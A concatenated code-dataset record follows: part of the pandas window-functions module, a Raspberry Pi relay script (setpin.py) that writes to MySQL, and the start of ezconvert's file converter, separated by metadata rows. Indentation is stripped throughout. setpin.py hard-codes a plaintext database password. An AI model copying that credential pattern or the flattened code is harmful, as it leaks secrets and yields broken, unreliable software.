inputs. In the case of missing elements, only complete pairwise
observations will be used.
ddof : int, default 1
Delta Degrees of Freedom. The divisor used in calculations
is ``N - ddof``, where ``N`` represents the number of elements.""")
def cov(self, other=None, pairwise=None, ddof=1, **kwargs):
if other is None:
other = self._selected_obj
# only default unset
pairwise = True if pairwise is None else pairwise
other = self._shallow_copy(other)
# GH 16058: offset window
if self.is_freq_type:
window = self.win_freq
else:
window = self._get_window(other)
def _get_cov(X, Y):
# GH #12373 : rolling functions error on float32 data
# to avoid potential overflow, cast the data to float64
X = X.astype('float64')
Y = Y.astype('float64')
mean = lambda x: x.rolling(window, self.min_periods,
center=self.center).mean(**kwargs)
count = (X + Y).rolling(window=window,
center=self.center).count(**kwargs)
bias_adj = count / (count - ddof)
return (mean(X * Y) - mean(X) * mean(Y)) * bias_adj
return _flex_binary_moment(self._selected_obj, other._selected_obj,
_get_cov, pairwise=bool(pairwise))
_shared_docs['corr'] = dedent("""
%(name)s sample correlation
Parameters
----------
other : Series, DataFrame, or ndarray, optional
if not supplied then will default to self and produce pairwise output
pairwise : bool, default None
If False then only matching columns between self and other will be
used and the output will be a DataFrame.
If True then all pairwise combinations will be calculated and the
output will be a MultiIndex DataFrame in the case of DataFrame inputs.
In the case of missing elements, only complete pairwise observations
will be used.""")
def corr(self, other=None, pairwise=None, **kwargs):
if other is None:
other = self._selected_obj
# only default unset
pairwise = True if pairwise is None else pairwise
other = self._shallow_copy(other)
window = self._get_window(other)
def _get_corr(a, b):
a = a.rolling(window=window, min_periods=self.min_periods,
center=self.center)
b = b.rolling(window=window, min_periods=self.min_periods,
center=self.center)
return a.cov(b, **kwargs) / (a.std(**kwargs) * b.std(**kwargs))
return _flex_binary_moment(self._selected_obj, other._selected_obj,
_get_corr, pairwise=bool(pairwise))
class Rolling(_Rolling_and_Expanding):
@cache_readonly
def is_datetimelike(self):
return isinstance(self._on,
(ABCDatetimeIndex,
ABCTimedeltaIndex,
ABCPeriodIndex))
@cache_readonly
def _on(self):
if self.on is None:
return self.obj.index
elif (isinstance(self.obj, ABCDataFrame) and
self.on in self.obj.columns):
from pandas import Index
return Index(self.obj[self.on])
else:
raise ValueError("invalid on specified as {0}, "
"must be a column (if DataFrame) "
"or None".format(self.on))
def validate(self):
super(Rolling, self).validate()
# we allow rolling on a datetimelike index
if ((self.obj.empty or self.is_datetimelike) and
isinstance(self.window, (compat.string_types, ABCDateOffset,
timedelta))):
self._validate_monotonic()
freq = self._validate_freq()
# we don't allow center
if self.center:
raise NotImplementedError("center is not implemented "
"for datetimelike and offset "
"based windows")
# this will raise ValueError on non-fixed freqs
self.win_freq = self.window
self.window = freq.nanos
self.win_type = 'freq'
# min_periods must be an integer
if self.min_periods is None:
self.min_periods = 1
elif not is_integer(self.window):
raise ValueError("window must be an integer")
elif self.window < 0:
raise ValueError("window must be non-negative")
if not self.is_datetimelike and self.closed is not None:
raise ValueError("closed only implemented for datetimelike "
"and offset based windows")
def _validate_monotonic(self):
""" validate on is monotonic """
if not self._on.is_monotonic:
formatted = self.on or 'index'
raise ValueError("{0} must be "
"monotonic".format(formatted))
def _validate_freq(self):
""" validate & return window frequency """
from pandas.tseries.frequencies import to_offset
try:
return to_offset(self.window)
except (TypeError, ValueError):
raise ValueError("passed window {0} is not "
"compatible with a datetimelike "
"index".format(self.window))
_agg_doc = dedent("""
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C'])
>>> df
A B C
0 -2.385977 -0.102758 0.438822
1 -1.004295 0.905829 -0.954544
2 0.735167 -0.165272 -1.619346
3 -0.702657 -1.340923 -0.706334
4 -0.246845 0.211596 -0.901819
5 2.463718 3.157577 -1.380906
6 -1.142255 2.340594 -0.039875
7 1.396598 -1.647453 1.677227
8 -0.543425 1.761277 -0.220481
9 -0.640505 0.289374 -1.550670
>>> df.rolling(3).sum()
A B C
0 NaN NaN NaN
1 NaN NaN NaN
2 -2.655105 0.637799 -2.135068
3 -0.971785 -0.600366 -3.280224
4 -0.214334 -1.294599 -3.227500
5 1.514216 2.028250 -2.989060
6 1.074618 5.709767 -2.322600
7 2.718061 3.850718 0.256446
8 -0.289082 2.454418 1.416871
9 0.212668 0.403198 -0.093924
>>> df.rolling(3).agg({'A':'sum', 'B':'min'})
A B
0 NaN NaN
1 NaN NaN
2 -2.655105 -0.165272
3 -0.971785 -1.340923
4 -0.214334 -1.340923
5 1.514216 -1.340923
6 1.074618 0.211596
7 2.718061 -1.647453
8 -0.289082 -1.647453
9 0.212668 -1.647453
See also
--------
pandas.Series.rolling
pandas.DataFrame.rolling
""")
@Appender(_agg_doc)
@Appender(_shared_docs['aggregate'] % dict(
versionadded='',
klass='Series/DataFrame'))
def aggregate(self, arg, *args, **kwargs):
return super(Rolling, self).aggregate(arg, *args, **kwargs)
agg = aggregate
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['count'])
def count(self):
# different impl for freq counting
if self.is_freq_type:
return self._apply('roll_count', 'count')
return super(Rolling, self).count()
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['apply'])
def apply(self, func, args=(), kwargs={}):
return super(Rolling, self).apply(func, args=args, kwargs=kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['sum'])
def sum(self, *args, **kwargs):
nv.validate_rolling_func('sum', args, kwargs)
return super(Rolling, self).sum(*args, **kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['max'])
def max(self, *args, **kwargs):
nv.validate_rolling_func('max', args, kwargs)
return super(Rolling, self).max(*args, **kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['min'])
def min(self, *args, **kwargs):
nv.validate_rolling_func('min', args, kwargs)
return super(Rolling, self).min(*args, **kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['mean'])
def mean(self, *args, **kwargs):
nv.validate_rolling_func('mean', args, kwargs)
return super(Rolling, self).mean(*args, **kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['median'])
def median(self, **kwargs):
return super(Rolling, self).median(**kwargs)
@Substitution(name='rolling')
@Appender(_shared_docs['std'])
def std(self, ddof=1, *args, **kwargs):
nv.validate_rolling_func('std', args, kwargs)
return super(Rolling, self).std(ddof=ddof, **kwargs)
@Substitution(name='rolling')
@Appender(_shared_docs['var'])
def var(self, ddof=1, *args, **kwargs):
nv.validate_rolling_func('var', args, kwargs)
return super(Rolling, self).var(ddof=ddof, **kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['skew'])
def skew(self, **kwargs):
return super(Rolling, self).skew(**kwargs)
_agg_doc = dedent("""
Examples
--------
The example below will show a rolling calculation with a window size of
four matching the equivalent function call using `scipy.stats`.
>>> arr = [1, 2, 3, 4, 999]
>>> fmt = "{0:.6f}" # limit the printed precision to 6 digits
>>> import scipy.stats
>>> print(fmt.format(scipy.stats.kurtosis(arr[:-1], bias=False)))
-1.200000
>>> print(fmt.format(scipy.stats.kurtosis(arr[1:], bias=False)))
3.999946
>>> s = pd.Series(arr)
>>> s.rolling(4).kurt()
0 NaN
1 NaN
2 NaN
3 -1.200000
4 3.999946
dtype: float64
""")
@Appender(_agg_doc)
@Substitution(name='rolling')
@Appender(_shared_docs['kurt'])
def kurt(self, **kwargs):
return super(Rolling, self).kurt(**kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['quantile'])
def quantile(self, quantile, **kwargs):
return super(Rolling, self).quantile(quantile=quantile, **kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['cov'])
def cov(self, other=None, pairwise=None, ddof=1, **kwargs):
return super(Rolling, self).cov(other=other, pairwise=pairwise,
ddof=ddof, **kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['corr'])
def corr(self, other=None, pairwise=None, **kwargs):
return super(Rolling, self).corr(other=other, pairwise=pairwise,
**kwargs)
class RollingGroupby(_GroupByMixin, Rolling):
"""
Provides a rolling groupby implementation
.. versionadded:: 0.18.1
"""
@property
def _constructor(self):
return Rolling
def _gotitem(self, key, ndim, subset=None):
# we are setting the index on the actual object
# here so our index is carried thru to the selected obj
# when we do the splitting for the groupby
if self.on is not None:
self._groupby.obj = self._groupby.obj.set_index(self._on)
self.on = None
return super(RollingGroupby, self)._gotitem(key, ndim, subset=subset)
def _validate_monotonic(self):
"""
validate that on is monotonic;
we don't care for groupby.rolling
because we have already validated at a higher
level
"""
pass
class Expanding(_Rolling_and_Expanding):
"""
Provides expanding transformations.
.. versionadded:: 0.18.0
Parameters
----------
min_periods : int, default 1
Minimum number of observations in window required to have a value
(otherwise result is NA).
center : boolean, default False
Set the labels at the center of the window.
axis : int or string, default 0
Returns
-------
a Window sub-classed for the particular operation
Examples
--------
>>> df = DataFrame({'B': [0, 1, 2, np.nan, 4]})
B
0 0.0
1 1.0
2 2.0
3 NaN
4 4.0
>>> df.expanding(2).sum()
B
0 NaN
1 1.0
2 3.0
3 3.0
4 7.0
Notes
-----
By default, the result is set to the right edge of the window. This can be
changed to the center of the window by setting ``center=True``.
See Also
--------
rolling : Provides rolling window calculations
ewm : Provides exponential weighted functions
"""
_attributes = ['min_periods', 'center', 'axis']
def __init__(self, obj, min_periods=1, center=False, axis=0,
**kwargs):
super(Expanding, self).__init__(obj=obj, min_periods=min_periods,
center=center, axis=axis)
@property
def _constructor(self):
return Expanding
def _get_window(self, other=None):
obj = self._selected_obj
if other is None:
return (max(len(obj), self.min_periods) if self.min_periods
else len(obj))
return (max((len(obj) + len(obj)), self.min_periods)
if self.min_periods else (len(obj) + len(obj)))
_agg_doc = dedent("""
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C'])
>>> df
A B C
0 -2.385977 -0.102758 0.438822
1 -1.004295 0.905829 -0.954544
2 0.735167 -0.165272 -1.619346
3 -0.702657 -1.340923 -0.706334
4 -0.246845 0.211596 -0.901819
5 2.463718 3.157577 -1.380906
6 -1.142255 2.340594 -0.039875
7 1.396598 -1.647453 1.677227
8 -0.543425 1.761277 -0.220481
9 -0.640505 0.289374 -1.550670
>>> df.ewm(alpha=0.5).mean()
A B C
0 -2.385977 -0.102758 0.438822
1 -1.464856 0.569633 -0.490089
2 -0.207700 0.149687 -1.135379
3 -0.471677 -0.645305 -0.906555
4 -0.355635 -0.203033 -0.904111
5 1.076417 1.503943 -1.146293
6 -0.041654 1.925562 -0.588728
7 0.680292 0.132049 0.548693
8 0.067236 0.948257 0.163353
9 -0.286980 0.618493 -0.694496
See also
--------
pandas.DataFrame.expanding.aggregate
pandas.DataFrame.rolling.aggregate
pandas.DataFrame.aggregate
""")
@Appender(_agg_doc)
@Appender(_shared_docs['aggregate'] % dict(
versionadded='',
klass='Series/DataFrame'))
def aggregate(self, arg, *args, **kwargs):
return super(Expanding, self).aggregate(arg, *args, **kwargs)
agg = aggregate
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['count'])
def count(self, **kwargs):
return super(Expanding, self).count(**kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['apply'])
def apply(self, func, args=(), kwargs={}):
return super(Expanding, self).apply(func, args=args, kwargs=kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['sum'])
def sum(self, *args, **kwargs):
nv.validate_expanding_func('sum', args, kwargs)
return super(Expanding, self).sum(*args, **kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['max'])
def max(self, *args, **kwargs):
nv.validate_expanding_func('max', args, kwargs)
return super(Expanding, self).max(*args, **kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['min'])
def min(self, *args, **kwargs):
nv.validate_expanding_func('min', args, kwargs)
return super(Expanding, self).min(*args, **kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['mean'])
def mean(self, *args, **kwargs):
nv.validate_expanding_func('mean', args, kwargs)
return super(Expanding, self).mean(*args, **kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['median'])
def median(self, **kwargs):
return super(Expanding, self).median(**kwargs)
@Substitution(name='expanding')
@Appender(_shared_docs['std'])
def std(self, ddof=1, *args, **kwargs):
nv.validate_expanding_func('std', args, kwargs)
return super(Expanding, self).std(ddof=ddof, **kwargs)
@Substitution(name='expanding')
@Appender(_shared_docs['var'])
def var(self, ddof=1, *args, **kwargs):
nv.validate_expanding_func('var', args, kwargs)
return super(Expanding, self).var(ddof=ddof, **kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['skew'])
def skew(self, **kwargs):
return super(Expanding, self).skew(**kwargs)
_agg_doc = dedent("""
Examples
--------
The example below will show an expanding calculation with a window size of
four matching the equivalent function call using `scipy.stats`.
>>> arr = [1, 2, 3, 4, 999]
>>> import scipy.stats
>>> fmt = "{0:.6f}" # limit the printed precision to 6 digits
>>> print(fmt.format(scipy.stats.kurtosis(arr[:-1], bias=False)))
-1.200000
>>> print(fmt.format(scipy.stats.kurtosis(arr, bias=False)))
4.999874
>>> s = pd.Series(arr)
>>> s.expanding(4).kurt()
0 NaN
1 NaN
2 NaN
3 -1.200000
4 4.999874
dtype: float64
""")
@Appender(_agg_doc)
@Substitution(name='expanding')
@Appender(_shared_docs['kurt'])
def kurt(self, **kwargs):
return super(Expanding, self).kurt(**kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['quantile'])
def quantile(self, quantile, **kwargs):
return super(Expanding, self).quantile(quantile=quantile, **kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['cov'])
def cov(self, other=None, pairwise=None, ddof=1, **kwargs):
return super(Expanding, self).cov(other=other, pairwise=pairwise,
ddof=ddof, **kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['corr'])
def corr(self, other=None, pairwise=None, **kwargs):
return super(Expanding, self).corr(other=other, pairwise=pairwise,
**kwargs)
class ExpandingGroupby(_GroupByMixin, Expanding):
"""
Provides a expanding groupby implementation
.. versionadded:: 0.18.1
"""
@property
def _constructor(self):
return Expanding
_bias_template = """
Parameters
----------
bias : boolean, default False
Use a standard estimation bias correction
"""
_pairwise_template = """
Parameters
----------
other : Series, DataFrame, or ndarray, optional
if not supplied then will default to self and produce pairwise output
pairwise : bool, default None
If False then only matching columns between self and other will be used and
the output will be a DataFrame.
If True then all pairwise combinations will be calculated and the output
will be a MultiIndex DataFrame in the case of DataFrame inputs.
In the case of missing elements, only complete pairwise observations will
be used.
bias : boolean, default False
Use a standard estimation bias correction
"""
class EWM(_Rolling):
r"""
Provides exponential weighted functions
.. versionadded:: 0.18.0
Parameters
----------
com : float, optional
Specify decay in terms of center of mass,
:math:`\alpha = 1 / (1 + com),\text{ for } com \geq 0`
span : float, optional
Specify decay in terms of span,
:math:`\alpha = 2 / (span + 1),\text{ for } span \geq 1`
halflife : float, optional
Specify decay in terms of half-life,
:math:`\alpha = 1 - exp(log(0.5) / halflife),\text{ for } halflife > 0`
alpha : float, optional
Specify smoothing factor :math:`\alpha` directly,
:math:`0 < \alpha \leq 1`
.. versionadded:: 0.18.0
min_periods : int, default 0
Minimum number of observations in window required to have a value
(otherwise result is NA).
adjust : boolean, default True
Divide by decaying adjustment factor in beginning periods to account
for imbalance in relative weightings (viewing EWMA as a moving average)
ignore_na : boolean, default False
Ignore missing values when calculating weights;
specify True to reproduce pre-0.15.0 behavior
Returns
-------
a Window sub-classed for the particular operation
Examples
--------
>>> df = DataFrame({'B': [0, 1, 2, np.nan, 4]})
B
0 0.0
1 1.0
2 2.0
3 NaN
4 4.0
>>> df.ewm(com=0.5).mean()
B
0 0.000000
1 0.750000
2 1.615385
3 1.615385
4 3.670213
Notes
-----
Exactly one of center of mass, span, half-life, and alpha must be provided.
Allowed values and relationship between the parameters are specified in the
parameter descriptions above; see the link at the end of this section for
a detailed explanation.
When adjust is True (default), weighted averages are calculated using
weights (1-alpha)**(n-1), (1-alpha)**(n-2), ..., 1-alpha, 1.
When adjust is False, weighted averages are calculated recursively as:
weighted_average[0] = arg[0];
weighted_average[i] = (1-alpha)*weighted_average[i-1] + alpha*arg[i].
When ignore_na is False (default), weights are based on absolute positions.
For example, the weights of x and y used in calculating the final weighted
average of [x, None, y] are (1-alpha)**2 and 1 (if adjust is True), and
(1-alpha)**2 and alpha (if adjust is False).
When ignore_na is True (reproducing pre-0.15.0 behavior), weights are based
on relative positions. For example, the weights of x and y used in
calculating the final weighted average of [x, None, y] are 1-alpha and 1
(if adjust is True), and 1-alpha and alpha (if adjust is False).
More details can be found at
http://pandas.pydata.org/pandas-docs/stable/computation.html#exponentially-weighted-windows
See Also
--------
rolling : Provides rolling window calculations
expanding : Provides expanding transformations.
"""
_attributes = ['com', 'min_periods', 'adjust', 'ignore_na', 'axis']
def __init__(self, obj, com=None, span=None, halflife=None, alpha=None,
min_periods=0, adjust=True, ignore_na=False,
axis=0):
self.obj = obj
self.com = _get_center_of_mass(com, span, halflife, alpha)
self.min_periods = min_periods
self.adjust = adjust
self.ignore_na = ignore_na
self.axis = axis
self.on = None
@property
def _constructor(self):
return EWM
_agg_doc = dedent("""
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C'])
>>> df
A B C
0 -2.385977 -0.102758 0.438822
1 -1.004295 0.905829 -0.954544
2 0.735167 -0.165272 -1.619346
3 -0.702657 -1.340923 -0.706334
4 -0.246845 0.211596 -0.901819
5 2.463718 3.157577 -1.380906
6 -1.142255 2.340594 -0.039875
7 1.396598 -1.647453 1.677227
8 -0.543425 1.761277 -0.220481
9 -0.640505 0.289374 -1.550670
>>> df.ewm(alpha=0.5).mean()
A B C
0 -2.385977 -0.102758 0.438822
1 -1.464856 0.569633 -0.490089
2 -0.207700 0.149687 -1.135379
3 -0.471677 -0.645305 -0.906555
4 -0.355635 -0.203033 -0.904111
5 1.076417 1.503943 -1.146293
6 -0.041654 1.925562 -0.588728
7 0.680292 0.132049 0.548693
8 0.067236 0.948257 0.163353
9 -0.286980 0.618493 -0.694496
See also
--------
pandas.DataFrame.rolling.aggregate
""")
@Appender(_agg_doc)
@Appender(_shared_docs['aggregate'] % dict(
versionadded='',
klass='Series/DataFrame'))
def aggregate(self, arg, *args, **kwargs):
return super(EWM, self).aggregate(arg, *args, **kwargs)
agg = aggregate
def _apply(self, func, **kwargs):
"""Rolling statistical measure using supplied function. Designed to be
used with passed-in Cython array-based functions.
Parameters
----------
func : string/callable to apply
Returns
-------
y : type of input argument
"""
blocks, obj, index = self._create_blocks()
results = []
for b in blocks:
try:
values = self._prep_values(b.values)
except TypeError:
results.append(b.values.copy())
continue
if values.size == 0:
results.append(values.copy())
continue
# if we have a string function name, wrap it
if isinstance(func, compat.string_types):
cfunc = getattr(_window, func, None)
if cfunc is None:
raise ValueError("we do not support this function "
"in _window.{0}".format(func))
def func(arg):
return cfunc(arg, self.com, int(self.adjust),
int(self.ignore_na), int(self.min_periods))
results.append(np.apply_along_axis(func, self.axis, values))
return self._wrap_results(results, blocks, obj)
@Substitution(name='ewm')
@Appender(_doc_template)
def mean(self, *args, **kwargs):
"""exponential weighted moving average"""
nv.validate_window_func('mean', args, kwargs)
return self._apply('ewma', **kwargs)
@Substitution(name='ewm')
@Appender(_doc_template)
@Appender(_bias_template)
def std(self, bias=False, *args, **kwargs):
"""exponential weighted moving stddev"""
nv.validate_window_func('std', args, kwargs)
return _zsqrt(self.var(bias=bias, **kwargs))
vol = std
@Substitution(name='ewm')
@Appender(_doc_template)
@Appender(_bias_template)
def var(self, bias=False, *args, **kwargs):
"""exponential weighted moving variance"""
nv.validate_window_func('var', args, kwargs)
def f(arg):
return _window.ewmcov(arg, arg, self.com, int(self.adjust),
int(self.ignore_na), int(self.min_periods),
int(bias))
return self._apply(f, **kwargs)
@Substitution(name='ewm')
@Appender(_doc_template)
@Appender(_pairwise_template)
def cov(self, other=None, pairwise=None, bias=False, **kwargs):
"""exponential weighted sample covariance"""
if other is None:
other = self._selected_obj
# only default unset
pairwise = True if pairwise is None else pairwise
other = self._shallow_copy(other)
def _get_cov(X, Y):
X = self._shallow_copy(X)
Y = self._shallow_copy(Y)
cov = _window.ewmcov(X._prep_values(), Y._prep_values(), self.com,
int(self.adjust), int(self.ignore_na),
int(self.min_periods), int(bias))
return X._wrap_result(cov)
return _flex_binary_moment(self._selected_obj, other._selected_obj,
_get_cov, pairwise=bool(pairwise))
@Substitution(name='ewm')
@Appender(_doc_template)
@Appender(_pairwise_template)
def corr(self, other=None, pairwise=None, **kwargs):
"""exponential weighted sample correlation"""
if other is None:
other = self._selected_obj
# only default unset
pairwise = True if pairwise is None else pairwise
other = self._shallow_copy(other)
def _get_corr(X, Y):
X = self._shallow_copy(X)
Y = self._shallow_copy(Y)
def _cov(x, y):
return _window.ewmcov(x, y, self.com, int(self.adjust),
int(self.ignore_na),
int(self.min_periods),
1)
x_values = X._prep_values()
y_values = Y._prep_values()
with np.errstate(all='ignore'):
cov = _cov(x_values, y_values)
x_var = _cov(x_values, x_values)
y_var = _cov(y_values, y_values)
corr = cov / _zsqrt(x_var * y_var)
return X._wrap_result(corr)
return _flex_binary_moment(self._selected_obj, other._selected_obj,
_get_corr, pairwise=bool(pairwise))
# Helper Funcs
def _flex_binary_moment(arg1, arg2, f, pairwise=False):
if not (isinstance(arg1, (np.ndarray, ABCSeries, ABCDataFrame)) and
isinstance(arg2, (np.ndarray, ABCSeries, ABCDataFrame))):
raise TypeError("arguments to moment function must be of type "
"np.ndarray/Series/DataFrame")
if (isinstance(arg1, (np.ndarray, ABCSeries)) and
isinstance(arg2, (np.ndarray, ABCSeries))):
X, Y = _prep_binary(arg1, arg2)
return f(X, Y)
elif isinstance(arg1, ABCDataFrame):
from pandas import DataFrame
def dataframe_from_int_dict(data, frame_template):
result = DataFrame(data, index=frame_template.index)
if len(result.columns) > 0:
result.columns = frame_template.columns[result.columns]
return result
results = {}
if isinstance(arg2, ABCDataFrame):
if pairwise is False:
if arg1 is arg2:
# special case in order to handle duplicate column names
for i, col in enumerate(arg1.columns):
results[i] = f(arg1.iloc[:, i], arg2.iloc[:, i])
return dataframe_from_int_dict(results, arg1)
else:
if not arg1.columns.is_unique:
raise ValueError("'arg1' columns are not unique")
if not arg2.columns.is_unique:
raise ValueError("'arg2' columns are not unique")
with warnings.catch_warnings(record=True):
X, Y = arg1.align(arg2, join='outer')
X = X + 0 * Y
Y = Y + 0 * X
with warnings.catch_warnings(record=True):
res_columns = arg1.columns.union(arg2.columns)
for col in res_columns:
if col in X and col in Y:
results[col] = f(X[col], Y[col])
return DataFrame(results, index=X.index,
columns=res_columns)
elif pairwise is True:
results = defaultdict(dict)
for i, k1 in enumerate(arg1.columns):
for j, k2 in enumerate(arg2.columns):
if j < i and arg2 is arg1:
# Symmetric case
results[i][j] = results[j][i]
else:
results[i][j] = f(*_prep_binary(arg1.iloc[:, i],
arg2.iloc[:, j]))
from pandas import MultiIndex, concat
result_index = arg1.index.union(arg2.index)
if len(result_index):
# construct result frame
result = concat(
[concat([results[i][j]
for j, c in enumerate(arg2.columns)],
ignore_index=True)
for i, c in enumerate(arg1.columns)],
ignore_index=True,
axis=1)
result.columns = arg1.columns
# set the index and reorder
if arg2.columns.nlevels > 1:
result.index = MultiIndex.from_product(
arg2.columns.levels + [result_index])
result = result.reorder_levels([2, 0, 1]).sort_index()
else:
result.index = MultiIndex.from_product(
[range(len(arg2.columns)),
range(len(result_index))])
result = result.swaplevel(1, 0).sort_index()
result.index = MultiIndex.from_product(
[result_index] + [arg2.columns])
else:
# empty result
result = DataFrame(
index=MultiIndex(levels=[arg1.index, arg2.columns],
labels=[[], []]),
columns=arg2.columns,
dtype='float64')
# reset our index names to arg1 names
# reset our column names to arg2 names
# careful not to mutate the original names
result.columns = result.columns.set_names(
arg1.columns.names)
result.index = result.index.set_names(
result_index.names + arg2.columns.names)
return result
else:
raise ValueError("'pairwise' is not True/False")
else:
results = {}
for i, col in enumerate(arg1.columns):
results[i] = f(*_prep_binary(arg1.iloc[:, i], arg2))
return dataframe_from_int_dict(results, arg1)
else:
return _flex_binary_moment(arg2, arg1, f)
def _get_center_of_mass(comass, span, halflife, alpha):
valid_count = com._count_not_none(comass, span, halflife, alpha)
if valid_count > 1:
raise ValueError("comass, span, halflife, and alpha "
"are mutually exclusive")
# Convert to center of mass; domain checks ensure 0 < alpha <= 1
if comass is not None:
if comass < 0:
raise ValueError("comass must satisfy: comass >= 0")
elif span is not None:
if span < 1:
raise ValueError("span must satisfy: span >= 1")
comass = (span - 1) / 2.
elif halflife is not None:
if halflife <= 0:
raise ValueError("halflife must satisfy: halflife > 0")
decay = 1 - np.exp(np.log(0.5) / halflife)
comass = 1 / decay - 1
elif alpha is not None:
if alpha <= 0 or alpha > 1:
raise ValueError("alpha must satisfy: 0 < alpha <= 1")
comass = (1.0 - alpha) / alpha
else:
raise ValueError("Must pass one of comass, span, halflife, or alpha")
return float(comass)
def _offset(window, center):
if not is_integer(window):
window = len(window)
offset = (window - 1) / 2. if center else 0
try:
return int(offset)
except:
return offset.astype(int)
def _require_min_periods(p):
def _check_func(minp, window):
if minp is None:
return window
else:
return max(p, minp)
return _check_func
def _use_window(minp, window):
if minp is None:
return window
else:
return minp
def _zsqrt(x):
with np.errstate(all='ignore'):
result = np.sqrt(x)
mask = x < 0
if isinstance(x, ABCDataFrame):
if mask.values.any():
result[mask] = 0
else:
if mask.any():
result[mask] = 0
return result
def _prep_binary(arg1, arg2):
if not isinstance(arg2, type(arg1)):
raise Exception('Input arrays must be of the same type!')
# mask out values, this also makes a common index...
X = arg1 + 0 * arg2
Y = arg2 + 0 * arg1
return X, Y
# Top-level exports
def rolling(obj, win_type=None, **kwds):
if not isinstance(obj, (ABCSeries, ABCDataFrame)):
raise TypeError('invalid type: %s' % type(obj))
if win_type is not None:
return Window(obj, win_type=win_type, **kwds)
return Rolling(obj, **kwds)
rolling.__doc__ = Window.__doc__
def expanding(obj, **kwds):
if not isinstance(obj, (ABCSeries, ABCDataFrame)):
raise TypeError('invalid type: %s' % type(obj))
return Expanding(obj, **kwds)
expanding.__doc__ = Expanding.__doc__
def ewm(obj, **kwds):
if not isinstance(obj, (ABCSeries, ABCDataFrame)):
raise TypeError('invalid type: %s' % type(obj))
return EWM(obj, **kwds)
ewm.__doc__ = EWM.__doc__
| 32.09457 | 95 | 0.567342 |
d061022c023c772520a2c32c9195928b8e49807d | 639 | py | Python | web/setpin.py | siskulous/PiStrip | f980705b90f7e0a397b2e6802121a531a5ff79b6 | [
"MIT"
] | null | null | null | web/setpin.py | siskulous/PiStrip | f980705b90f7e0a397b2e6802121a531a5ff79b6 | [
"MIT"
] | null | null | null | web/setpin.py | siskulous/PiStrip | f980705b90f7e0a397b2e6802121a531a5ff79b6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from RPi import GPIO
import sys
import MySQLdb
db=MySQLdb.connect(user='webhead',
passwd='MonkeyBoneIsATerribleMovie',
db='powerstrip',
host="localhost")
GPIO.setmode(GPIO.BCM)
state=int(sys.argv[2])
pin= int(sys.argv[1])
if pin == 1:
relay=6
elif pin == 2:
relay=13
elif pin == 3:
relay=19
elif pin == 4:
relay=26
else:
print "Invalid relay"
sys.exit()
'''
gpio.init()
gpio.setcfg(relay, gpio.OUTPUT)
gpio.output(relay, state)
'''
GPIO.setup(relay,GPIO.OUT)
GPIO.output(relay,state)
q=db.cursor()
query="UPDATE outlets SET currentState=%s WHERE oid=%s"
q.execute(query, (state, pin))
db.commit()
db.close | 18.257143 | 55 | 0.70892 |
af991f621d6f2f1ecfae882e8d932673d5d0d7b1 | 9,114 | py | Python | ezconvert/convert.py | blahoink/ezconvert | 82403ba5c37f73323709db3de78e18e860e824e0 | [
"MIT"
] | null | null | null | ezconvert/convert.py | blahoink/ezconvert | 82403ba5c37f73323709db3de78e18e860e824e0 | [
"MIT"
] | null | null | null | ezconvert/convert.py | blahoink/ezconvert | 82403ba5c37f73323709db3de78e18e860e824e0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
import argparse
import csv
import io
import logging
import numpy as np
import os
import pandas as pd
import pkg_resources
import sys
import yaml
from .version import __version__
logger = logging.getLogger('root')
provided_converters = [
'mq2pin',
'mq2pcq',
'mq2psea',
'mq2elutator_trainer',
'mq2tmtc'
]
def write_df_to_file(df, headers, out_path):
with open(out_path, 'w') as f:
f.write(headers)
logger.info('Writing output to {} ...'.format(out_path))
df.to_csv(out_path, sep=output_sep, header=False,
index=write_row_names, mode='a', quoting=quoting)
def convert_files(config_file_name=None, input_list=None, input_files=None, output=None):
if config_file_name is None:
raise Exception('No configuration file (existing name or file path) provided.')
# load vars from the config file
if isinstance(config_file_name, io.BufferedReader):
config_file = config_file_name.read()
config_file_name = 'buffer'
elif config_file_name in provided_converters:
config_file = pkg_resources.resource_string('ezconvert', '/'.join(('converters', config_file_name + '.py')))
else:
logger.info('Loading config file functions from {}.'.format(config_file_name))
with open(config_file_name, 'rb') as f:
config_file = f.read()
exec(compile(config_file, config_file_name, 'exec'), globals())
# read inputs, either from the input list or from the command line
_input = []
if input_list is not None:
logger.info('Reading in input files from input list {}.'.format(input_list.name))
with open(input_list.name, 'r') as f:
_input = yaml.load(f)
else:
logger.info('Reading in input files from command line.')
_input = [f.name for f in input_files]
if len(_input) == 0:
raise Exception('No input files provided, either from the input list or the command line.')
df = pd.DataFrame()
# iterate through each input file provided.
for i, f in enumerate(_input):
# first expand user or any vars
f = os.path.expanduser(f)
